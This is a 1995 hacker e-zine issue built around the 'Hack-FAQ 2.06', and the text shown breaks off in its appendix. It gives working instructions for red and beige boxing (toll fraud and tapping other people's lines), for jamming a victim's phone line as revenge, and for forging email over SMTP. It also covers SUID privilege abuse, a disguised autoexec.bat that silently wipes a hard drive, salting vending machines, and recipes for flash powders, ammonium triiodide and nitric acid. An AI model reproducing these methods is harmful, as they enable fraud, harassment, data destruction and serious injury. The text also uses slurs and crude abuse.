* * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, October, 1995 Edited by: Revolution Table Of Contents From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution The Hack-FAQ 2.06. . . . . . . . . . . . . . . . . . . Beliasarius and N P The Pursuit of Knowledge, Notes on the Guild. . . . . . . . . . . . Route The LACC Mailing List . . . . . . . . . . . . . . . . . . .Julian Assange 2600 Meetings . . . . . . . . . . . . . . . . . . . . . . . . . . . FuSIoN Billwatch #18 . . . . . . . . . . . . . . Voters Telecommunications Watch A VMS Login Spoof . . . . . . . . . . . . . . . . . . . . . . . Talonphish Remote Host Probing. . . . . . . . . . . . . . . . . . . . . . . . IOERROR The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution ----------------------------------------------------------------- ----------- copyright 1995 by Mike Scanlon All articles remain the property of their authors, and may be reprinted with their permission. This zine may be reprinted freely as a whole electronically, for hard copy rights mail the editor. HACKERS is published monthly by Mike Scanlon, to be added to the subscription list or to submit articles mail scanlonr@delphi.com ----------------------------------------------------------------- ----------- * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #1 of 9 From the Editor An amazing amount of things have gone on here at Hackers since last issue. I started college at NJIT, so you might notice that this issue is coming from a different address. I've kept my email address the same for the time being, although if you send anything to mrs3691@hertz.njit.edu I will receive it also. Hackers has a new web page up, where issues are now browsable in html form at http://hertz.njit.edu/~mrs3691. There are no graphics up as of yet, so don't expect anything much. NJIT is located in Newark New Jersey, so I'm local to all of NYC. If any of you attend the 2600 meetings in the Citicorp building, plan on seeing me there in the future. Alas, due to the increased workload, I've had to diminish my net presence in recent weeks, but as I adjust I'll probably be on a little more. In the near future, in fact, my comp sci class might set up a telnetable BBS, so look for some cool things from that. When I started this issue, I thought it might suffer because I did not have enough time to put into it, but a few good submissions turned that around. This month we have an essay on the guild from it's founding member, a login spoof you can use with last month's VMS hacking article, and a couple other cool articles. The Hack-FAQ, although a good source of info for beginning hackers, is more of a sentimental article due to some things that have been happening in the old ISCA crowd, such as the return of it's editor to the scene, and the prospective return of a few other old friends. Also, I'd like to take this chance to recommend everyone to subscribe to Billwatch. Although issues of it have been cropping up in here for the last few issues, if this is your only source of it, you are missing some very good information. This issue it has some very good info on the state of the cryptography debate, which I think everybody should take at least a glance at, so I decided to include it once again. Anyway, as always I've got to go and do some homework, so I hope you like this issue. - Revolution * * * * * * * * * * * * * * * * * * * * As always, the standard disclaimer applies. All of these articles are provided for informational purposes only, Mike Scanlon and the respective authors cannot be held accountable for any illegal acts they are used to commit. * * * * * * * * * * * * * * * * * * * * -= H A C K E R S =- Issue #3, File #2 of 9 +---------------+ | THE HACK-FAQ! | | Edition 2.06 | | 14 FEB 1994 | +---------------+ "Knowledge is power" --Francis Bacon "United we stand, divided we fall" --Aesop <*> Edited by <*> # Editor-in-Chief # Belisarius # Asst. Editor # Neurophire (on Shadow and N P on ISCA) A MatrixMage Electronic Publication With help from some members of KARMA/K.R.A. Special Thanks to the Following Contributors: Z Maestro RA of ISCA Underground> DINO RA of Shadow Hack and Crack> Artimage RA of SKYNET Underground> Faunus Revolution Matrixx Amarand Beelzebub Redbeard IO CyberSorceror Doktor Nil Skipster CPT Ozone Abort Carsenio Hi there, Hackers and Newbies alike! We have compiled this, THE HACK-FAQ!, for all of you out there. Please if you have any suggestions, contributions, criticisms, whatever, mail at the above addresses. You might be wondering...where did edition 2.05 go? Well before I could get it out I got in a lot more good shit and decided to update it again before sending it out. To receive a copy of THE HACK-FAQ! via E-mail then send E-mail to me at the address above. THE HACK-FAQ! is a roughly monthly update and I am currently looking for a site with LISTSERV capabilities. Thanks and keep hacking! Remember to keep working and to always try to educate yourself and gather information. If you're a newbie then read THE HACK-FAQ! first and use it as a springboard to start from. If you're a hacker then please contribute to this document. -=> Belisarius <=- Hey, to the CrackerJack crowd, keep struggling!! You can make it above, that's what I am beginning to do! There is hope! :) ])> Neurophyre <([ Distribution of THE HACK-FAQ! is encouraged and promoted, as long as it is distributed as the entire file. Keep up with latest editions. Look for the latest edition of THE HACK-FAQ! in every KARMA/K.R.A. Irregular Zine. THE HACK-FAQ! is (c) of MatrixMage(tm) Publications. MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor are not responsible for any consequences. You use this information at your own risk. ***************************************************************** **** CONTENTS Sections I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc) II. Fake E-Mail III. Salting Vending Machines IV. Explosives V. Virii VI. UNIX Passwords VII. Phucking with MS-DOS VIII. Cracking programs IX. PGP / Data Encryption X. Chemistry (drugs and explosive/pyrotechnic component prep) XI. 'Cyberpunk'/Futuristic/Underground Culture Appendices A. FTP sites with useful info B. Interesting Gophers C. Informative USENET Newsgroups D. Publications and Catalogs E. PGP Key Appendix ***************************************************************** **** ================================================================= ==== I. Phone Fun WHAT IS A RED BOX AND HOW DO I MAKE ONE? (from Doktor Nil) First note: a redbox is merely a device which plays the tone a payphone makes when you insert money. You just play it through the mike on the handset. You would think that the Phone Co. would mute the handset until you put a quarter in, and perhaps they are starting to build phones like that, but I have yet to see one. What you need: - Radio Shack 33 memory Pocket Tone Dialer - 6.4 - 6.5536 megahertz crystal (get 6.5 Mhz from Digikey, address below) - A solder gun. - Someone who can point out the crystal in the Tone Dialer. Instructions: 1) Open up the back of the tone dialer. Use screwdriver. 2) Locate crystal. It should be toward the right side. It will be smaller than the 6.5 Mhz one you bought, but otherwise vaguely similar. It is basically capsule-shaped, with two electrodes coming out of the bottom which are soldered onto a circuit board. It's on the _left_ side, basically the third large crystal thing from the bottom, about 1.5 cm long, metallic, thin. 3) De-solder, and de-attach, crystal. Heat the solder that the crystal is seated in; remove crystal. 4) Attach 6.5 Mhz crystal. It is easiest just to use the solder which is already there from the old crystal, that way there is less chance of you dropping hot solder somewhere it shouldn't be and losing everything. Heat first one drop of solder with the solder gun, and seat one electrode of the 6.4 Mhz crystal in it, then do the same with the other. This is the easiest part to mess up, be careful that both drops of solder don't run together. 5) Put cover back on. you are done. How to use: Five presses of the "*" key will make the quarter sound. I think fewer presses make nickel/dime sounds, but I can't remember specifically. Here in Michigan, you can simply hold it up to the handset and press memory recall button 1 (where you have conveniently recorded five *'s -read the tone dialer directions on how to do this) and get a quarter credit, _IF_ you are calling LD. Keep making the tone to get additional credits. There is a maximum number of credits you can have at once. To make a local call this may not work. You need to first put in a real coin, then you can use the redbox for additional credits. There may be a way around this, however: Call the operator, and ask her to dial your number for you. She should do this without asking why, it is a regular service. If you need an excuse, say the "4" key isn't working, or something. She will ask you to insert your money. At this point use the redbox. If all goes well, she dials your number and you're in business. If she says "Will you do that one more time," or "Who is this," or any variations, hang up and walk away. ----------------------------------------------------------------- ---- WHAT DO THESE CRYSTALS LOOK LIKE? In most cases, a rectangular metal can with two bare wires coming out of one end, and a number like "6.50000" stamped on one side. ----------------------------------------------------------------- ---- WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL? (from Matrixx) 6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536 is the easiest to find (Radio Shack) ----------------------------------------------------------------- ---- WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX? The crystals are available from Digi-Key. Call 1-800-DIGIKEY (1-800-344-4539) for more info. The part order number from DIGI-KEY is x-415-ND ----------------------------------------------------------------- ---- WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX? (from DINO) For a Radio Shack conversion red box: a nickel is one * and a quarter is 5 *s Here are the freq's for a red box: $.25 1700Hz & 2200Hz for a length of 33 milliseconds for each pulse with 33 millisecond pause between each pulse $.10 1700Hz & 2200Hz 2 pulses at 66 milliseconds and with 66 millisecond pauses $.05 one pulse at the above freq's for 66 milliseconds! ----------------------------------------------------------------- ---- HOW DO YOU KNOW THAT THE PHONE IS A COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ----------------------------------------------------------------- ---- FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ----------------------------------------------------------------- ---- HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. Cut off the head on one end of the phone cord. 2. Strip the coating. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a retard, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the scored [the "screwy end"] end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ----------------------------------------------------------------- ---- BEIGE BOXING 101 Phield Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and phry a phreak" it dosen't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this phile to whoever the fuck you want, just make sure it all stays together, same title, same byline. Phield phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hitek revenge, anything you can do from your own fone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your fone cord before the jak, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's fone cord? Just unscrew a jak from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a fone, laptop, your mom, anything you can plug in a jak.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on fone poles, where your fone line meets your house, and near payfones. I'll go into detail below, but basically just open any box on a telefone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a fone jak. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just phuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telefone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one fone line. These are the fist sized gray or black boxes that appear where a single fone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their fone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. These are the 3 foot high green/gray metal columns that are no wider than a telefone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of fone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from phriends and some social engineering, I learned that inside is where two underground fone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to fone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6x4, attached to a telefone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 fones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 fones the box connects too). On houses: follow the fone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payfones: follow the fone line up from the fone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little fone jak. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there'll be a sw. ap. like those on houses (see above). Payfones are normally pretty secure now though, and you probably won't find any of those. Phreaky things you can do: Jesus, do I have to tell you L/-\m3rs everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hitek revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to 3l33+ for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something alot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telefone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two termianls with a paper clip, alligator clip, even your mother's pussylips! His fone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (asshole's #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, email revolution@delphi.com no PGP needed. ----------------------------------------------------------------- ---- HOW CAN YOU INTERCEPT CELLULAR PHONE CONVERSATIONS? (from CPT Ozone) You can intercept most cellular phone signals on any old radio that pulls in police and air bands? Look for them at garage sales and junk yards. ----------------------------------------------------------------- ---- WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ----------------------------------------------------------------- ---- HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to chhose the number of ports for your conference call, and how to dial each participant.. ================================================================= ==== II. Fake E-mail HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL SMTP)? (from Beelzebub, Doktor Nil) 1. Telnet to port 25 of any internet server (eg oberlin.edu 25) 2. If at all possible, AVOID TYPING "HELO". Type mail from:(fake name) 3. Type rcpt to:(person who gets mail) 4. The mail server should ok each time after each name. 5. If it does not: a) type vrfy and then the name of the person b) as a last resort use helo, this will login your computer as having been the source of the mail 6. Retype the commands, it should say ok now. 7. Type data 8. Enter your letter 9. To send letter type a "." on an empty line. 10. Then type quit 11. This is traceable by any sysadmin ... don't harass people this way. 12. If the person receiving the mail uses a shell like elm he/she will not see the telltale fake message warning "Apparently-To:(name)" even if not, most people wouldn't know what it means anyway. 13. Make sure you use a four part address somebody@part1.pt2.pt3.pt4 so as to make it look more believable and cover any addons the mail routine might try 14. Put a realistic mail header in the mail message to throw people off even more. If there are To: and Date: lines then the program probably won't add them on. 15. Also try to telnet to the site where the recipient has his account. This works better if you know how to fool it. ================================================================= ==== III. Salting vending machines WHAT DOES SALTING VENDING MACHINES DO? When you take concentrated salt water (a high concentration of salt) and squirt it into the change slot (preferably where the dollar bills come in, though some say it doesn't matter), the salt will short circuit the machine and out will pour change and hopefully sodas. ================================================================= ==== IV. Explosives FLASH POWDERS: (from Neurophyre) Materials: Powdered magnesium, powdered potassium nitrate 1. Mix 1 part powdered magnesium and 4 parts of powdered potassium nitrate. 2. Light it with a long fuse cuz its so bright it might screw up your eyes. REAL Cherry Bomb Powder 4 parts by weight of potassium perchlorate 1 part by weight of antimony trisulfide (if you can find 1 part by weight aluminum powder regular antimony sulfide contact Neurophyre!) Relatively Safe 3 parts by weight of potassium permanganate 2 parts by weight of aluminum powder *VERY* Shock/Friction/Static/Heat Sensitive! Use only if suicidal or desperate! 4 parts by weight of potassium chlorate 1 part by weight of sulfur 1 part by weight of aluminum powder 1) To use these mixtures, SEPARATELY pulverize each ingredient into a fine powder, the finer it is, the more power you get. Use a mortar and pestle if available, and grind GENTLY. Do not use plastic as this can build a static charge. Remember, do them SEPARATELY. ----------------------------------------------------------------- ---- AMATEUR EXPLOSIVE (Ammonium Triiodide): (from IO) WARNING: This explosive is EXTREMELY shock sensitive when dry, and moderately sensitive when wet!!! AVOID IT when dry! DO NOT store! The purplish iodine vapor this produces during the explosion will stain and corrode! 1) Take a small plastic bucket, add 3-4 inches of household ammonia. This bucket will never be clean again, in all likelihood. Try to get clear (non-pine, non-cloudy) ammonia. Or use an ammonium hydroxide solution from a chemlab. This results in better but more sensitive, and therefore dangerous crystals. 2) Drop in iodine (like you use on scratches) one drop at a time, or, preferably, use crystals of iodine. 3) Let it settle, then pour it through a piece of cloth, discarding the runoff. 4) Squeeze *gently* to get out excess liquid. 5) Mold it onto the thing you want to blow up, stand **way** back. 6) Wait for it to dry, and throw a rock at it. ================================================================= ==== V. Virii WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] You can't get busted for anything having to do with this BBS. Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. ----------------------------------------------------------------- ---- INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sectornubmer, bits 6,7=cylindernumber(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ================================================================= ==== VI. Unix HOW IS THE UNIX PASSWORD FILE SETUP? (from Belisarius) The password file is usually called /etc/passwd Each line of the passwd file of a UNIX system follows the following format: userid:password:userid#:groupid#:GECOS field:home dir:shell What each of these fields mean/do--- userid -=> the userid name, entered at login and is what the login searches the file for. Can be a name or a number. password -=> the password is written here in encrypted form. The encryption is one way only. When a login occurs the password entered is run thru the encryption algorithm (along with a salt) and then contrasted to the version in the passwd file that exists for the login name entered. If they match, then the login is allowed. If not, the password is declared invalid. userid# -=> a unique number assigned to each user, used for permissions groupid# -=> similar to userid#, but controls the group the user belongs to. To see the names of various groups check /etc/group GECOS FIELD -=> this field is where information about the user is stored. Usually in the format full name, office number, phone number, home phone. Also a good source of info to try and crack a password. home dir -=> is the directory where the user goes into the system at (and usually should be brought to when a cd is done) shell -=> this is the name of the shell which is automatically started for the login Note that all the fields are separated by colons in the passwd file. ----------------------------------------------------------------- ---- WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE? (from Belisarius) Those mean that the password is shadowed in another file. You have to find out what file, where it is and so on. Ask somebody on your system about the specifics of the Yellow Pages system, but discretely! ----------------------------------------------------------------- ---- WHAT IS A UNIX TRIPWIRE? (from Belisarius) Tripwire is a tool for Unix admins to use to detect password cracker activity, by checking for changed files, permissions, etc. Good for looking for trojan horses like password stealing versions of telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like. USING SUID/GUID PROGS TO FULL ADVANTAGE. (from Abort) A SUID program is a program that when executed has the privs of the owner. A GUID has the privs of the group when executed. Now imagine a few things (which happen often in reality): 1. Someone has a SUID program on their account, it happens to allow a shell to, like @ or jump to a shell. If it does that, after you execute said file and then spawn a shell off of it, all you do in that shell has the privs of that owner. 2. If there is no way to get a shell, BUT they leave the file writable, just write over it a script that spawns a shell, and you got their privs again. ================================================================= ==== VII. Phucking with MS-DOS HOW TO REALLY **ERASE** A HARDDRIVE (from Amarand) Install a small program (in the Dos directory would be good) called Wipe, by Norton Utilities. I am pretty sure that executing this program, using the proper command line options, you can for one better than formatting the hard drive. Wiping the information changes each bit in the object (file, FAT, disk, hard drive) to a zero...or a random bit, or an alternating bit instead of just deleting the reference to it in the file allocation table. If you just delete a file, or format a hard drive...with the new Dos you would only need to let it run its course and then Unformat the drive. Wipe, I have found, works much more effectively by first erasing the file allocation table AFTER erasing the information the file allocation table is used to find. ----------------------------------------------------------------- ---- WRITING A .bat FILE TO 'WIPE' A DRIVE. Add the following code to the end of autoexc.bat: echo Please wait echo Checking HardDisk for virii, this make take a while ... wipe > nothing.txt This prevents any output from Wipe being output. ================================================================= ==== VIII. Cracking Programs WHAT ARE PASSWORD CRACKING PROGRAMS? (from Belisarius) There are three main cracking programs. They are Crack, Cracker Jack and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3 runs on any x86 class and CJack1.4 needs at least a 386. To use any of these requires access to an unshadowed password file. They are not programs that try to login to an account. They take the password file (/etc/passwd in UNIX is usually the name) and guess the passwords. ----------------------------------------------------------------- ---- WHERE CAN I GET THESE PROGRAMS? (from Redbeard) Crack , CrackerJack, and COPS at ftp plaza.aarnet.edu.au in the /secutiry/cert directory WHAT IS WPCRACK? WPCRAK is a cracker to break the encryption on WordPerfect files. It works, but takes a long time to run. ----------------------------------------------------------------- ---- WHAT IS PKCRACK? PKCRACK is a dictionary cracker for PKZIP. It works. It's dictionary, but it works. Not all that well, as you may have to sift through multiple possible passwords, but its better than nothing. Look for it at ftp plains.nodak.edu ================================================================= ==== IX. PGP / Data Encryption WHAT IS PGP? (from Belisarius) PGP stands for Pretty Good Protection, from a company called Pretty Good Software. It is a public key encryption program for MS-DOS, Unix, and Mac. You create a key pair. One private (secret) key and a public key. The keys are different parts of the whole. I distribute my public key and anyone who wants can grab it ad it to their PGP keyring. Then when they want to send me a message they encrypt it with PGP and my public key and then send it. Only I can decrypt it because you need my secret key to decode it. (Trust me you won't get my secret key) That is PGP. Please use it if you want to communicate anything of a ahhhh....sensitive manner. ----------------------------------------------------------------- ---- WHERE CAN I GET PGP? (from an archie search) FTP sites for PGP=Pretty Good Privacy Public Encryption System -------------------------------------------------------------- ======== Unix PGP ======== Host 130.149.17.7 Location: /pub/local/ini/security FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z Host arthur.cs.purdue.edu Location: /pub/pcert/tools/unix/pgp FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z Host coombs.anu.edu.au Location: /pub/security/cypher FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z Host dutepp0.et.tudelft.nl Location: /pub/Unix/Security FILE -rw-rw-r-- 651826 Oct 4 12:40 pgp22.tar.Z Host isy.liu.se Location: /pub/misc/pgp/2.2 FILE -rw-r--r-- 651826 Mar 10 1993 pgp22.tar.Z Host lhc.nlm.nih.gov Location: /pub/hunter FILE -rw-r--r-- 651826 Jun 30 00:00 pgp22.tar.Z ========== MS-DOS PGP ========== Host zero.cypher.com Location: /pub/pgp FILE pgp23a.zip ================ MS-DOS PGP SHELL ================ Host athene.uni-paderborn.de Location: /pcsoft/msdos/security FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip Host nic.switch.ch Location: /mirror/msdos/security FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip Host pc.usl.edu Location: /pub/msdos/crypto FILE -rw-r--r-- 65160 Sep 1 15:42 pgpshe22.zip Host plains.nodak.edu Location: /pub/aca/msdos/pgp FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip Host plaza.aarnet.edu.au Location: /micros/pc/garbo/pc/crypt FILE -r--r--r-- 65430 Aug 3 11:40 pgpshe22.zip Location: /micros/pc/oak/security FILE -r--r--r-- 65160 Aug 9 20:00 pgpshe22.zip ======= Mac PGP ======= Host plaza.aarnet.edu.au Location: /micros/mac/info-mac/util FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx Host sics.se Location: /pub/info-mac/util FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx Host sumex-aim.stanford.edu Location: /info-mac/util FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx ================================================================= ==== X. CHEMISTRY (from Neurophire) /*\*/*\*/*\*/*\*/*\*/*\*/ COMING SOON /*\*/*\*/*\*/*\*/*\*/*\*/ How to cheaply make Potassium Chlorate! Easily! KClO3 is an ingredient in some plastic explosives and in unstable flash powders, as well as incendiary powders, bricks, and quick and dirty smoke mix! HOW TO MAKE NITRIC ACID: Nitric acid is not TOO expensive, but is hard to find except from chemical supply houses. Purchases can be traced.(From TBBOM13.TXT) There are several ways to make this most essential of all acids for explosives. One method by which it could be made will be presented. again, be reminded that these methods SHOULD NOT BE CARRIED OUT!! Materials: Equipment: ---------- ---------- sodium nitrate or adjustable heat source potassium nitrate retort distilled water ice bath concentrated sulfuric acid stirring rod collecting flask with stopper 1) Pour 32 milliliters of concentrated sulfuric acid into the retort. 2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium nitrate. and add this to the acid slowly. If it all does not dissolve, carefully stir the solution with a glass rod until it does. 3) Place the open end of the retort into the collecting flask, and place the collecting flask in the ice bath. 4) Begin heating the retort, using low heat. Continue heating until liquid begins to come out of the end of the retort. The liquid that forms is nitric acid. Heat until the precipitate in the bottom of the retort is almost dry, or until no more nitric acid is forming. CAUTION: If the acid is heated too strongly, the nitric acid will decompose as soon as it is formed. This can result in the production of highly flammable and toxic gasses that may explode. It is a good idea to set the above apparatus up, and then get away from it. Potassium nitrate could also be obtained from store-bought black powder, simply by dissolving black powder in boiling water and filtering out the sulfur and charcoal. To obtain 68 g of potassium nitrate, it would be necessary to dissolve about 90 g of black powder in about one litre of boiling water. Filter the dissolved solution through filter paper in a funnel into a jar until the liquid that pours through is clear. The charcoal and sulfur in black powder are insoluble in water, and so when the solution of water is allowed to evaporate, potassium nitrate will be left in the jar. ================================================================= ==== XI. 'Cyberpunk'/Futuristic/Underground Culture "Every time I release a phile, or write an article for a zine, it's vaguely like a baby. It gets stored, and copied, and sent out all over the world, and people read it. It goes into their minds. Something I created is buried in living tissue and consciousness someplace. Eventually somebody uses it, and I know that I have the power to change the world. Somewhere, someplace, somebody changed something using information I changed or created. I helped to change the world." --Unknown That is the attitude of many of the people who, knowingly or not, are members of this hyped culture. Some who may read this will see some of their undefined beliefs, hopes and feelings reflected in the above quote. And, as the quote says, they will help spread it. Somewhere, somehow, that quote will change the world. ================================================================= ==== Appendix A. FTP sites with useful info: ftp.eff.org wiretap.spies.com hpacv.com (mail postmaster@hpacv.com for info phirst) phred.pc.cc.cmu.edu quartz.rutgers.edu uglymouse.css.itd.umich.edu grind.isca.uiowa.edu zero.cypher.com cert.sei.cmu.edu plains.nodak.edu etext.archive.umich.edu ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/ black.ox.ac.uk Dictionaries ftp.win.tue.nl world.std.com clr.nmsu.edu glis.cr.usgs.gov \ These two sites will give you martini.eecs.umich.edu 3000 / whatever info you need about any city. ================================================================= ==== Apendix B. Interesting gophers: gopher.eff.org 5070 gopher.wired.com techno.stanford.edu phred.pc.cc.cmu.edu ================================================================= ==== Appendix C. Informative USENET Newsgroups alt.tcom alt.forgery alt.cyberpunk alt.2600 alt.hackers (need to hack into this one) alt.security alt.security.pgp alt.unix.wizards misc.security sci.computer.security sci.crypt sci.electronics rec.pyrotechnics sci.chem alt.locksmith Also try IRC #hack. *** WARNING: May be lame at times!!! *** ================================================================= ==== Appendix D. Publications and Catalogs 2600- a technical journal put out by hackers mail: email: 2600 2600@well.sf.ca.us PO Box 752 Middle Island, NY 11953 PH:516-751-2600 ----------------------------------------------------------------- ---- PHRACK The electronic journal of hackers and phreakers. Email: phrack@well.sf.ca.us ----------------------------------------------------------------- ---- Books APPLIED CRYPTOGRAPHY: PROTOCOLS, ALGORITHMS, AND SOURCE CODE IN C Bruce Schneier, 1994, John Wiley & Sons. Comprehensive. VERY well worth it to anyone into crypto. Davis, Tenney L.: "Chemistry of Powder and Explosives." Hogan, Thom: "The Programmer's PC Sourcebook" (Microsoft Press) Russell: "Computer Security Basics" Cornwall: "The (New) Hacker's Handbook" "Cyberpunk" (forget the authors) ----------------------------------------------------------------- ---- Lockpicks (from Belisarius) American Systems 2100 Roswell Road Suite 200C-223 Marietta, GA 30062 Lock Pick Sets -------------- Novice ($32.50): 11 pix, tension 